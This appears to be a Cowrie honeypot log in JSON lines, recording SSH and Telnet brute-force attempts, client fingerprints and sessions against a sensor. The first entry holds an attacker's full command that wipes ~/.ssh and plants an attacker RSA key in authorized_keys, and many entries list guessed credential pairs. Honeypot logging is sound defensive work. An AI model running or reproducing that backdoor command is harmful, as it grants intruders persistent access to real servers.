{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:17:26.901244Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:17:27.111690Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:27.112502Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":56937,"dst_ip":"1.2.3.4","dst_port":22,"session":"67fd76051884","protocol":"ssh","message":"New connection: 154.209.4.55:56937 (1.2.3.4:22) [session: 67fd76051884]","sensor":"my-vps","timestamp":"2025-09-09T04:17:27.307632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:17:27.308362Z","src_ip":"154.209.4.55","session":"67fd76051884"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123123","message":"login attempt [deploy/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:17:27.323682Z","src_ip":"103.59.95.12","session":"5c63fb5a501a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:17:27.509683Z","src_ip":"154.209.4.55","session":"67fd76051884"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:17:28.345501Z","src_ip":"154.209.4.55","session":"67fd76051884"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:28.579229Z","src_ip":"103.59.95.12","session":"5c63fb5a501a"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:29.545364Z","src_ip":"154.209.4.55","session":"67fd76051884"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":57469,"dst_ip":"1.2.3.4","dst_port":22,"session":"74f4dbb7932d","protocol":"ssh","message":"New connection: 154.209.4.55:57469 (1.2.3.4:22) [session: 74f4dbb7932d]","sensor":"my-vps","timestamp":"2025-09-09T04:17:29.744613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:17:29.748991Z","src_ip":"154.209.4.55","session":"74f4dbb7932d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:17:29.948584Z","src_ip":"154.209.4.55","session":"74f4dbb7932d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:17:30.766933Z","src_ip":"154.209.4.55","session":"74f4dbb7932d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:30.976045Z","src_ip":"154.209.4.55","session":"74f4dbb7932d"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:30.976997Z","src_ip":"154.209.4.55","session":"2d3bd4aaf0f3"}
{"eventid":"cowrie.session.closed","duration":14.087326049804688,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:34.461813Z","src_ip":"212.227.125.160","session":"6a30c728fa27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49347,"dst_ip":"1.2.3.4","dst_port":23,"session":"18ae96f01384","protocol":"telnet","message":"New connection: 212.227.125.160:49347 (1.2.3.4:23) [session: 18ae96f01384]","sensor":"my-vps","timestamp":"2025-09-09T04:17:34.696326Z"}
{"eventid":"cowrie.session.closed","duration":14.07754111289978,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:35.425409Z","src_ip":"212.227.125.160","session":"234f2fe5d85c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49354,"dst_ip":"1.2.3.4","dst_port":23,"session":"1847e879e422","protocol":"telnet","message":"New connection: 212.227.125.160:49354 (1.2.3.4:23) [session: 1847e879e422]","sensor":"my-vps","timestamp":"2025-09-09T04:17:35.641850Z"}
{"eventid":"cowrie.session.closed","duration":13.267006397247314,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:47.963280Z","src_ip":"212.227.125.160","session":"18ae96f01384"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49561,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e956c1a8410","protocol":"telnet","message":"New connection: 212.227.125.160:49561 (1.2.3.4:23) [session: 5e956c1a8410]","sensor":"my-vps","timestamp":"2025-09-09T04:17:48.139550Z"}
{"eventid":"cowrie.session.closed","duration":13.729315280914307,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:49.371098Z","src_ip":"212.227.125.160","session":"1847e879e422"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49574,"dst_ip":"1.2.3.4","dst_port":23,"session":"154ecf63caee","protocol":"telnet","message":"New connection: 212.227.125.160:49574 (1.2.3.4:23) [session: 154ecf63caee]","sensor":"my-vps","timestamp":"2025-09-09T04:17:49.671041Z"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":35914,"dst_ip":"1.2.3.4","dst_port":22,"session":"14f2cf17b595","protocol":"ssh","message":"New connection: 152.32.190.168:35914 (1.2.3.4:22) [session: 14f2cf17b595]","sensor":"my-vps","timestamp":"2025-09-09T04:17:55.570371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:17:55.571383Z","src_ip":"152.32.190.168","session":"14f2cf17b595"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:17:55.768388Z","src_ip":"152.32.190.168","session":"14f2cf17b595"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":36008,"dst_ip":"1.2.3.4","dst_port":22,"session":"496697093439","protocol":"ssh","message":"New connection: 192.210.135.20:36008 (1.2.3.4:22) [session: 496697093439]","sensor":"my-vps","timestamp":"2025-09-09T04:17:56.402122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:17:56.402649Z","src_ip":"192.210.135.20","session":"496697093439"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:17:56.512047Z","src_ip":"192.210.135.20","session":"496697093439"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234","message":"login attempt [pi/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:17:56.599140Z","src_ip":"152.32.190.168","session":"14f2cf17b595"}
{"eventid":"cowrie.login.failed","username":"test3","password":"test31234","message":"login attempt [test3/test31234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:17:56.991848Z","src_ip":"192.210.135.20","session":"496697093439"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:57.797880Z","src_ip":"152.32.190.168","session":"14f2cf17b595"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:17:58.103753Z","src_ip":"192.210.135.20","session":"496697093439"}
{"eventid":"cowrie.session.closed","duration":13.522877931594849,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:01.662327Z","src_ip":"212.227.125.160","session":"5e956c1a8410"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49847,"dst_ip":"1.2.3.4","dst_port":23,"session":"76ac14075733","protocol":"telnet","message":"New connection: 212.227.125.160:49847 (1.2.3.4:23) [session: 76ac14075733]","sensor":"my-vps","timestamp":"2025-09-09T04:18:01.874601Z"}
{"eventid":"cowrie.session.closed","duration":13.172197580337524,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:02.843170Z","src_ip":"212.227.125.160","session":"154ecf63caee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49892,"dst_ip":"1.2.3.4","dst_port":23,"session":"e1790a1a4a12","protocol":"telnet","message":"New connection: 212.227.125.160:49892 (1.2.3.4:23) [session: e1790a1a4a12]","sensor":"my-vps","timestamp":"2025-09-09T04:18:02.996067Z"}
{"eventid":"cowrie.session.closed","duration":13.152356147766113,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:15.026885Z","src_ip":"212.227.125.160","session":"76ac14075733"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50110,"dst_ip":"1.2.3.4","dst_port":23,"session":"144d2a6fddc9","protocol":"telnet","message":"New connection: 212.227.125.160:50110 (1.2.3.4:23) [session: 144d2a6fddc9]","sensor":"my-vps","timestamp":"2025-09-09T04:18:15.208777Z"}
{"eventid":"cowrie.session.closed","duration":14.080715417861938,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:17.076712Z","src_ip":"212.227.125.160","session":"e1790a1a4a12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50123,"dst_ip":"1.2.3.4","dst_port":23,"session":"a8615e28a266","protocol":"telnet","message":"New connection: 212.227.125.160:50123 (1.2.3.4:23) [session: a8615e28a266]","sensor":"my-vps","timestamp":"2025-09-09T04:18:17.376862Z"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":42914,"dst_ip":"1.2.3.4","dst_port":22,"session":"616bbc616c53","protocol":"ssh","message":"New connection: 211.22.25.164:42914 (1.2.3.4:22) [session: 616bbc616c53]","sensor":"my-vps","timestamp":"2025-09-09T04:18:27.221089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:18:27.222148Z","src_ip":"211.22.25.164","session":"616bbc616c53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:18:27.462256Z","src_ip":"211.22.25.164","session":"616bbc616c53"}
{"eventid":"cowrie.login.failed","username":"monitor","password":"qwerty","message":"login attempt [monitor/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T04:18:28.461316Z","src_ip":"211.22.25.164","session":"616bbc616c53"}
{"eventid":"cowrie.session.closed","duration":13.670031070709229,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:28.878740Z","src_ip":"212.227.125.160","session":"144d2a6fddc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50337,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b3e28bd9ed2","protocol":"telnet","message":"New connection: 212.227.125.160:50337 (1.2.3.4:23) [session: 6b3e28bd9ed2]","sensor":"my-vps","timestamp":"2025-09-09T04:18:29.082804Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:29.703884Z","src_ip":"211.22.25.164","session":"616bbc616c53"}
{"eventid":"cowrie.session.closed","duration":13.435834169387817,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:30.812626Z","src_ip":"212.227.125.160","session":"a8615e28a266"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50351,"dst_ip":"1.2.3.4","dst_port":23,"session":"5daaf3b191e7","protocol":"telnet","message":"New connection: 212.227.125.160:50351 (1.2.3.4:23) [session: 5daaf3b191e7]","sensor":"my-vps","timestamp":"2025-09-09T04:18:31.082562Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":47884,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7a1b0c825c3","protocol":"ssh","message":"New connection: 51.81.118.153:47884 (1.2.3.4:22) [session: c7a1b0c825c3]","sensor":"my-vps","timestamp":"2025-09-09T04:18:31.872678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:18:31.873462Z","src_ip":"51.81.118.153","session":"c7a1b0c825c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:18:31.970166Z","src_ip":"51.81.118.153","session":"c7a1b0c825c3"}
{"eventid":"cowrie.login.failed","username":"edu","password":"password123","message":"login attempt [edu/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:18:32.396967Z","src_ip":"51.81.118.153","session":"c7a1b0c825c3"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":40968,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccb3c79559d0","protocol":"ssh","message":"New connection: 154.209.4.55:40968 (1.2.3.4:22) [session: ccb3c79559d0]","sensor":"my-vps","timestamp":"2025-09-09T04:18:33.329821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:18:33.332169Z","src_ip":"154.209.4.55","session":"ccb3c79559d0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:33.496224Z","src_ip":"51.81.118.153","session":"c7a1b0c825c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:18:33.535018Z","src_ip":"154.209.4.55","session":"ccb3c79559d0"}
{"eventid":"cowrie.login.failed","username":"test","password":"Test1234","message":"login attempt [test/Test1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:18:34.356752Z","src_ip":"154.209.4.55","session":"ccb3c79559d0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:35.568290Z","src_ip":"154.209.4.55","session":"ccb3c79559d0"}
{"eventid":"cowrie.session.closed","duration":13.698424100875854,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:42.756046Z","src_ip":"212.227.125.160","session":"6b3e28bd9ed2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50583,"dst_ip":"1.2.3.4","dst_port":23,"session":"c76fb9990869","protocol":"telnet","message":"New connection: 212.227.125.160:50583 (1.2.3.4:23) [session: c76fb9990869]","sensor":"my-vps","timestamp":"2025-09-09T04:18:42.977396Z"}
{"eventid":"cowrie.session.closed","duration":12.839834451675415,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:18:43.922301Z","src_ip":"212.227.125.160","session":"5daaf3b191e7"}
